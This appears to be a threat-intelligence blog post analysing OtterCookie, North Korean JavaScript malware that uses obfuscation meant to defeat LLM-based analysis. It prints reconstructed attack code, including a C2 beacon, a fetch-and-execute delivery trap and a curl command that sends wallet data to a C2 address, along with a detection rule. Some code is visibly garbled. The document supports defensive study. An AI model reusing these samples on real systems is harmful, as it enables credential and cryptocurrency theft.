OtterCookie’s Anti-LLM Obfuscation: How North Korean Hackers Are Breaking AI-Powered Malware Analysis + Video

Listen to this Post

Featured Image

Introduction

In a cat-and-mouse game that defines modern cybersecurity, North Korea’s Lazarus Group has unveiled a sophisticated JavaScript obfuscator in their OtterCookie malware that’s specifically designed to thwart Large Language Model (LLM)-based analysis tools. By implementing scope-dependent substitution ciphers, flattened control flow with infinite loop state machines, and aggressive variable recycling, this malware creates a computational maze that exceeds the context window limitations of even the most advanced AI systems. This technical deep-dive explores the mechanics of this anti-AI obfuscation, providing security professionals with the manual analysis techniques required to dissect malware designed to blind our newest analytical tools.

Learning Objectives

  • Understand how OtterCookie’s context-dependent cipher system creates scope-specific decryption challenges that break automated LLM analysis
  • Master manual deobfuscation techniques for flattened control flow malware using infinite loop state machines
  • Learn to identify and track recycled variable patterns across complex JavaScript malware
  • Implement detection strategies for anti-VM and anti-sandbox techniques employed by North Korean threat actors
  • Develop practical skills for analyzing multi-stage malware delivery through npm packages and fake job recruitment campaigns

You Should Know

1. The Anatomy of OtterCookie’s Anti-LLM Obfuscation

The JavaScript obfuscator used by DPRK’s OtterCookie malware represents a paradigm shift in evasion tactics, moving beyond traditional signature-based bypass to actively exploit the architectural limitations of LLM-based analysis tools. As noted by malware researcher Marcus Hutchins, “Each scope uses a substitution cipher with a different alphabet, so what value a given encoded string decodes to depends on where within the code its located” . This creates a scenario where identical encoded strings produce different decoded values depending on their lexical context, effectively breaking the pattern recognition capabilities that LLMs rely upon.

The implementation leverages a per-scope cipher mapping that might look something like this in practice:

// Simplified example of OtterCookie's scope-dependent cipher
(function() {
// Scope A: Alphabet mapping A→Z, B→Y, etc.
var encoded = "ovvgh";
// Decodes to "hello" in this scope

(function() {
// Scope B: Different alphabet mapping A→B, B→C, etc.
var encoded = "ovvgh";
// Decodes to completely different value
})();
})();

The control flow flattening technique transforms what would be straightforward sequential code into an infinite loop controlled by a state machine. Instead of normal branching with if/else statements, the entire function body executes within a `for (;;)` infinite loop, with a state variable determining which code block executes on each iteration. This creates analysis paralysis for automated tools because understanding the code’s flow requires tracking hundreds of constantly changing states simultaneously.

2. Manual Deobfuscation: Breaking the State Machine

When LLMs fail due to context window exhaustion, security analysts must return to fundamental reverse engineering techniques. The key to deobfuscating OtterCookie lies in systematic state tracking and code normalization. Here’s a practical approach using Node.js debugging tools:

 Install necessary tools for JavaScript analysis
npm install -g js-beautify
npm install -g eslint

Create a debugging harness
cat > analyze.js << 'EOF'
const fs = require('fs');
const vm = require('vm');

// Load the obfuscated code
const code = fs.readFileSync('ottercookie.sample.js', 'utf8');

// Create a sandbox with logging hooks
const sandbox = {
console: {
log: (...args) => {
console.log('[bash]', ...args);
fs.appendFileSync('execution.log', args.join(' ') + '\n');
}
},
// Track state changes
__stateHistory: []
};

// Add proxy to track variable assignments
const sandboxProxy = new Proxy(sandbox, {
set(target, prop, value) {
if (prop.toString().startsWith('state_')) {
target.__stateHistory.push({
time: Date.now(),
variable: prop,
value: value
});
}
target[bash] = value;
return true;
}
});

// Execute with debugging
vm.createContext(sandboxProxy);
vm.runInContext(code, sandboxProxy);

// Analyze state transition patterns
console.log('State transitions:', sandboxProxy.__stateHistory.length);
EOF

node analyze.js

This approach allows analysts to trace the state machine’s behavior without getting lost in the obfuscation. The key insight is that while the code appears chaotic, the actual state transitions follow predictable patterns that can be mapped and understood through execution tracing.

3. Environment Detection and Anti-VM Techniques

OtterCookie implements sophisticated environment fingerprinting that activates before any malicious payload is delivered, making sandbox analysis particularly challenging. According to recent analysis, the malware checks for virtualization indicators across all major operating systems :

// OtterCookie's VM detection code (deobfuscated)
const setHeader = async function () {
try {
let isVM = false;

if (os.platform() == "win32") {
// Windows VM detection
let output = execSync("wmic computersystem get model,manufacturer", 
{ windowsHide: true });
output = output.toString().toLowerCase();
if (output.includes("vmware") || 
output.includes("virtualbox") || 
output.includes("microsoft corporation") || 
output.includes("qemu")) {
isVM = true;
}
} else if (os.platform() == "darwin") {
// macOS VM detection
let output = execSync("system_profiler SPHardwareDataType", 
{ windowsHide: true });
output = output.toString().toLowerCase();
if (/vmware|virtualbox|qemu|parallels|virtual/i.test(output)) 
isVM = true;
} else if (os.platform() == "linux") {
// Linux VM detection
let output = fs.readFileSync("/proc/cpuinfo", "utf8").toLowerCase();
if (/hypervisor|vmware|virtio|kvm|qemu|xen/i.test(output)) 
isVM = true;
}

// Beacon to C2 with VM status
const result = await axios.post(
"http://144.172.104.117:5918/api/service/process/" + uid,
{
OS: os.type(),
platform: os.platform(),
release: os.release() + (isVM ? " (VM)" : " (Local)"),
host: os.hostname(),
userinfo: os.userInfo(),
uid,
t: 66
}
);

// C2 tells client to stop if flagged as VM
if (result.data && result.data.release.includes("(VM)")) {
return false;
}
} catch (e) {
return true;
}
}

For security analysts, defeating these checks requires modifying the sandbox environment to return realistic responses. On Linux systems, this might involve:

 Modify /proc/cpuinfo to remove hypervisor indicators
sudo mount -o bind /path/to/modified/cpuinfo /proc/cpuinfo

Create modified cpuinfo without VM strings
cat > ~/modified_cpuinfo << 'EOF'
processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 85
model name : Intel(R) Xeon(R) Platinum 8175M CPU @ 2.50GHz
stepping : 4
cpu MHz : 2499.998
cache size : 33792 KB
EOF

4. The “Controlled Failure” Delivery Mechanism

Perhaps the most ingenious aspect of OtterCookie’s design is its delivery mechanism, which exploits developer trust through what appears to be legitimate error handling. According to ANY.RUN’s analysis, the malware is delivered through fake job interviews where the victim is asked to fix a minor visual bug in a Node.js application . The repository appears completely clean, but contains a carefully crafted try/catch block:

// The malicious try/catch pattern observed in OtterCookie delivery
try {
// Application initialization code
initializeApp();

// Intentionally trigger an error
throw new Error("Unexpected reserved word");
} catch (error) {
// This appears to be error handling but actually fetches and executes malware
console.log("Handling error:", error.message);

// Fetch what looks like error information but is actually the payload
fetch('https://chainlink-api-v3[.]cloud/error-details')
.then(response => response.json())
.then(data => {
// The require() executes the fetched code
require('vm').runInThisContext(data.errorHandler);
})
.catch(err => console.log('Error handler failed'));
}

This technique is particularly effective because developers are conditioned to expect error handling code and may not scrutinize it closely. The error message itself—”Unexpected reserved word”—appears plausible in a JavaScript context, and the application continues running normally after the “error handling” completes, giving no indication that malware has been executed.

5. Multi-Stage Payload Delivery and Persistence

Once initial execution succeeds, OtterCookie evolves through multiple stages, each adding new capabilities. The Socket.dev analysis reveals that the malware establishes persistence through multiple concurrent workers, each handling different malicious functions :

// OtterCookie's multi-process architecture (reconstructed)
const main = async function() {
// Environment checks pass, now launch payloads
if (await setHeader()) {
// Launch three detached processes
const workers = ['ss()', 'aa()', 'bb()'];

workers.forEach(workerCode => {
const child = spawn('node', ['-e', workerCode], {
detached: true,
stdio: 'ignore',
windowsHide: true
});
child.unref(); // Detach so parent can exit
});
}
}

// Worker functions handle different aspects:
// ss(): Clipboard theft and remote command execution
// aa(): Browser credential and wallet data theft
// bb(): Keylogging, screenshot capture, and file exfiltration

This architecture makes detection and removal significantly more difficult. Even if the main process is terminated, the detached workers continue running in the background. The use of Node.js for these operations is particularly clever—it leverages a legitimate development tool that may not raise suspicion from endpoint detection systems.

On macOS systems, OtterCookie uses native commands for data theft, which Elastic security researchers have documented in their detection rules :

 Elastic detection rule for OtterCookie clipboard theft
process where host.os.type == "macos" and event.type == "start" and 
process.name == "pbpaste" and process.args_count == 1 and
(process.parent.name in ("node", "osascript") or process.parent.name like "python") and
not process.parent.executable like "/Users//.pyenv/versions//bin/python3"

This rule detects when Node.js or Python processes spawn the `pbpaste` utility—a clear indicator of automated clipboard harvesting.

6. Targeted Data Theft: Cryptocurrency and Credentials

OtterCookie’s primary objective is financial gain through cryptocurrency theft. The malware systematically targets wallet data, browser credentials, and sensitive documents. According to the NTT Security analysis, the malware searches for Ethereum private keys using regular expressions and specifically targets Firefox profile directories containing Solana-related data .

The data exfiltration process follows a predictable pattern:

 Simulated OtterCookie data collection pattern
 On compromised systems, look for:
 - Browser credential databases (Chrome: Login Data, Firefox: logins.json)
 - Wallet extensions: MetaMask, Phantom, Solflare, Exodus
 - macOS Keychain access
 - Files with crypto-related keywords

Compression before exfiltration
tar -czf /tmp/p.zi ~/.config/Solana ~/.config/ethereum ~/Documents/wallet

Exfiltration to C2 on port 1224
curl -X POST http://144.172.101.45:1224/uploads \
-F "data=@/tmp/p.zi" \
-F "uid=$(hostname)-$(whoami)"

The consistent use of port 1224 and the `/uploads` path matches patterns seen in related malware families like InvisibleFerret and Beavertail, suggesting code reuse across the Lazarus Group’s toolkit .

7. Evolution and Version Tracking

OtterCookie has undergone rapid evolution since its discovery in late 2024. The PolySwarm blog documents at least five distinct versions, with each adding new capabilities and refining evasion techniques . Key evolutionary milestones include:

  • v1 (September 2024): Basic file grabber with cryptocurrency wallet targeting
  • v2 (November 2024): Socket.IO communication and remote command execution
  • v3 (February 2025): Windows support added, hardcoded file collection patterns
  • v4 (April 2025): Virtual environment detection, clipboard theft using OS commands instead of libraries
  • v5 (August 2025): Keylogging and screenshot capabilities, merged with BeaverTail functionality

The progression from using third-party libraries like `clipboardy` to native OS commands (pbpaste on macOS, PowerShell on Windows) represents a significant advancement in evasion—reducing dependencies that might be flagged by security tools and making the malware more resilient to library removals or updates.

What Undercode Say

The emergence of OtterCookie’s anti-LLM obfuscation marks a critical inflection point in the cybersecurity arms race. North Korean threat actors have recognized that our most powerful analysis tools have fundamental limitations, and they’re exploiting those limitations with surgical precision. The key takeaways from this analysis are sobering yet instructive.

First, the attack chain demonstrates that social engineering remains the most effective initial access vector. Despite sophisticated technical measures, the infection begins with a simple LinkedIn message offering freelance work—a tactic that bypasses technical controls by targeting human psychology. Organizations must invest in security awareness training that specifically addresses recruitment-based attacks, teaching employees to verify job offers through out-of-band channels and never run code from untrusted sources.

Second, the malware’s evolution shows that state-sponsored actors are actively researching defensive technologies and adapting their tools accordingly. The shift from library-based to OS-native clipboard theft, the addition of VM detection, and the anti-LLM obfuscation all indicate a threat actor that studies security tools and builds countermeasures. Defenders must adopt similar research methodologies, analyzing adversary techniques and developing detection strategies before they become widespread.

Third, the supply chain implications cannot be overstated. The use of npm packages and Bitbucket repositories as delivery mechanisms means that developers are now on the front lines of cyber defense. Code repositories must be treated as critical infrastructure, with the same level of scrutiny applied to dependencies that we apply to network traffic. Automated scanning of npm packages, verification of repository authenticity, and careful review of post-install scripts are no longer optional—they’re essential security controls.

Finally, the failure of LLMs to analyze this malware highlights a crucial lesson: AI tools are augmentations, not replacements, for human analysts. While LLMs excel at pattern recognition and code summarization, they cannot yet handle the combinatorial explosion of states in flattened control flow malware. Human analysts must maintain their reverse engineering skills, and automated tools must be designed to fail gracefully—escalating to human review when context windows are exceeded rather than hallucinating incorrect results.

Prediction

Looking forward, we can expect the Lazarus Group to continue refining their anti-analysis techniques, potentially incorporating AI-powered obfuscation that dynamically generates unique code patterns for each victim. The convergence of BeaverTail and OtterCookie functionality suggests a unified malware framework that can be rapidly customized for different targets and platforms.

Within the next 12-18 months, we’ll likely see similar obfuscation techniques adopted by ransomware groups and cybercriminal enterprises, democratizing what is currently a state-sponsored capability. This will create an urgent need for new analysis tools that combine the pattern recognition of LLMs with the deterministic execution tracing of traditional sandboxes.

Defenders must respond by developing hybrid analysis platforms that can handle massive state spaces through distributed processing and incremental context management. The arms race between obfuscation and analysis is entering a new phase, and the side that can better leverage automation while maintaining human oversight will ultimately prevail.

References

  1. ANY.RUN. “OtterCookie: Analysis of New Lazarus Group Malware.” June 2025.
  2. Elastic Security. “Pbpaste Execution via Unusual Parent Process.” February 2026.
  3. NTT Security. “OtterCookie, new malware used in Contagious Interview campaign.” January 2025.
  4. Socket.dev. “Inside the GitHub Infrastructure Powering North Korea’s Contagious Interview npm Attacks.” November 2025.
  5. PolySwarm. “Famous Chollima Evolves Its Arsenal, Merging BeaverTail and OtterCookie.”
  6. NTT Security. “Additional Features of OtterCookie Malware Used by WaterPlum.” May 2025.

▶️ Related Video (84% Match):

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Malwaretech The – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky